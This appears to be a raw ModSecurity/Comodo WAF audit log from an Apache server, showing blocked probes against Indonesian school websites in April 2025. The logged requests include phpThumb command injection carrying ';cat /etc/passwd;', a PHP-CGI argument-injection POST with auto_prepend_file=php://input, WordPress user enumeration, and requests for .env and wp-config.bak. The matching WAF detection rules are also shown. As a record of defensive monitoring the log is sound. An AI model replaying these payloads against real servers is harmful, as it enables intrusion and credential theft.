Accept-Encoding: gzip X-Varnish: 9363698 --1da3fa35-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; 
charset=iso-8859-1 --1da3fa35-E-- --1da3fa35-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578351620539 1492 (- - -) Stopwatch2: 1745578351620539 1492; combined=511, p1=362, p2=122, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1da3fa35-Z-- --d2ff397d-A-- [25/Apr/2025:17:52:31 +0700] aAtpb_Ku9d5eAb6Kn98pewAAAMM 103.236.140.4 44726 103.236.140.4 8181 --d2ff397d-B-- GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363701 --d2ff397d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d2ff397d-E-- --d2ff397d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578351819239 2330 (- - -) Stopwatch2: 1745578351819239 2330; combined=588, p1=398, p2=157, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2ff397d-Z-- --e4767368-A-- [25/Apr/2025:17:52:32 +0700] aAtpcPKu9d5eAb6Kn98pfAAAAMY 103.236.140.4 44726 103.236.140.4 8181 --e4767368-B-- GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270239 --e4767368-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e4767368-E-- --e4767368-H-- Message: Access denied 
with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578352018398 1788 (- - -) Stopwatch2: 1745578352018398 1788; combined=539, p1=382, p2=129, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4767368-Z-- --e1bd7164-A-- [25/Apr/2025:17:52:32 +0700] aAtpcPKu9d5eAb6Kn98pfQAAAMw 103.236.140.4 44726 103.236.140.4 8181 --e1bd7164-B-- GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363704 --e1bd7164-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 
Content-Type: text/html; charset=iso-8859-1 --e1bd7164-E-- --e1bd7164-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578352216803 1486 (- - -) Stopwatch2: 1745578352216803 1486; combined=499, p1=346, p2=124, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1bd7164-Z-- --11d29167-A-- [25/Apr/2025:17:52:32 +0700] aAtpcPKu9d5eAb6Kn98pfgAAANA 103.236.140.4 44726 103.236.140.4 8181 --11d29167-B-- GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270242 --11d29167-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --11d29167-E-- --11d29167-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578352415231 1559 (- - -) Stopwatch2: 1745578352415231 1559; combined=594, p1=384, p2=182, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11d29167-Z-- --6b8f3b08-A-- [25/Apr/2025:17:57:01 +0700] aAtqfeOdEP6frSVs8Cp6CwAAABE 103.236.140.4 45768 103.236.140.4 8181 --6b8f3b08-B-- GET /wp-config.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 5.161.58.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.161.58.65 X-Forwarded-Proto: http Connection: close Accept: */* --6b8f3b08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b8f3b08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.bak" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578621762024 950 (- - -) Stopwatch2: 1745578621762024 950; combined=406, p1=363, p2=0, p3=0, p4=0, p5=43, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b8f3b08-Z-- --ea4a3d31-A-- [25/Apr/2025:19:20:20 +0700] aAt-BD8HMZgF-3Y3GtGGJgAAAE4 103.236.140.4 36820 103.236.140.4 8181 --ea4a3d31-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --ea4a3d31-C-- --ea4a3d31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea4a3d31-E-- --ea4a3d31-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745583620207834 5365 (- - -) Stopwatch2: 1745583620207834 5365; combined=3531, p1=572, p2=2928, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea4a3d31-Z-- --f446c334-A-- [25/Apr/2025:19:44:31 +0700] aAuDr_Ku9d5eAb6Kn98xCgAAANU 103.236.140.4 42440 103.236.140.4 8181 --f446c334-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 35.204.172.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.204.172.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f446c334-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f446c334-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745585071480172 3040 (- - -) Stopwatch2: 1745585071480172 3040; combined=1302, p1=440, p2=830, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f446c334-Z-- --0bb5ac04-A-- [25/Apr/2025:19:50:18 +0700] aAuFCuXF4ZX3hX-IbN7roQAAAIU 103.236.140.4 57112 103.236.140.4 8181 --0bb5ac04-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 193.218.7.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.218.7.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0bb5ac04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bb5ac04-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745585418697492 3098 (- - -) Stopwatch2: 1745585418697492 3098; combined=1328, p1=457, p2=839, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bb5ac04-Z-- --54c6dc6c-A-- [25/Apr/2025:19:53:20 +0700] aAuFwD8HMZgF-3Y3GtGMHAAAAFM 103.236.140.4 37904 103.236.140.4 8181 --54c6dc6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.231.89.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.231.89.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --54c6dc6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54c6dc6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745585600476063 2103 (- - -) Stopwatch2: 1745585600476063 2103; combined=1184, p1=409, p2=749, p3=0, p4=0, p5=26, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54c6dc6c-Z-- --77d91a32-A-- [25/Apr/2025:20:37:09 +0700] aAuQBfKu9d5eAb6Kn99aQQAAAM0 103.236.140.4 37902 103.236.140.4 8181 --77d91a32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.106.192.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.106.192.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --77d91a32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77d91a32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745588229541149 3678 (- - -) Stopwatch2: 1745588229541149 3678; combined=1804, p1=538, p2=1226, p3=0, p4=0, p5=40, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77d91a32-Z-- --1e64335e-A-- [25/Apr/2025:20:47:18 +0700] aAuSZvKu9d5eAb6Kn99f3wAAAMo 103.236.140.4 56358 103.236.140.4 8181 --1e64335e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.191.185.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.191.185.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1e64335e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e64335e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745588838324473 2618 (- - -) Stopwatch2: 1745588838324473 2618; combined=1266, p1=427, p2=810, p3=0, p4=0, p5=29, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e64335e-Z-- --36657c28-A-- [25/Apr/2025:21:22:33 +0700] aAuaqT8HMZgF-3Y3GtGy9gAAAEw 103.236.140.4 36276 103.236.140.4 8181 --36657c28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G925F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --36657c28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36657c28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745590953193642 797 (- - -) Stopwatch2: 1745590953193642 797; combined=343, p1=295, p2=0, p3=0, p4=0, p5=47, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36657c28-Z-- --2e3bd624-A-- [25/Apr/2025:21:25:13 +0700] aAubSfKu9d5eAb6Kn99h5QAAAMk 103.236.140.4 36892 103.236.140.4 8181 --2e3bd624-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.209.195 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.209.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --2e3bd624-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e3bd624-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745591113976380 762 (- - -) Stopwatch2: 1745591113976380 762; combined=314, p1=273, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e3bd624-Z-- --8ac4c474-A-- [25/Apr/2025:21:53:15 +0700] aAuh2-OdEP6frSVs8Cq4XQAAAAo 103.236.140.4 43314 103.236.140.4 8181 --8ac4c474-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.238.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.238.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8ac4c474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ac4c474-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745592795930163 3405 (- - -) Stopwatch2: 1745592795930163 3405; combined=1555, p1=499, p2=965, p3=0, p4=0, p5=91, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ac4c474-Z-- --d186fa28-A-- [25/Apr/2025:22:19:25 +0700] aAun_T8HMZgF-3Y3GtG1ZAAAAEA 103.236.140.4 49394 103.236.140.4 8181 --d186fa28-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.131.15.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.131.15.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d186fa28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d186fa28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: 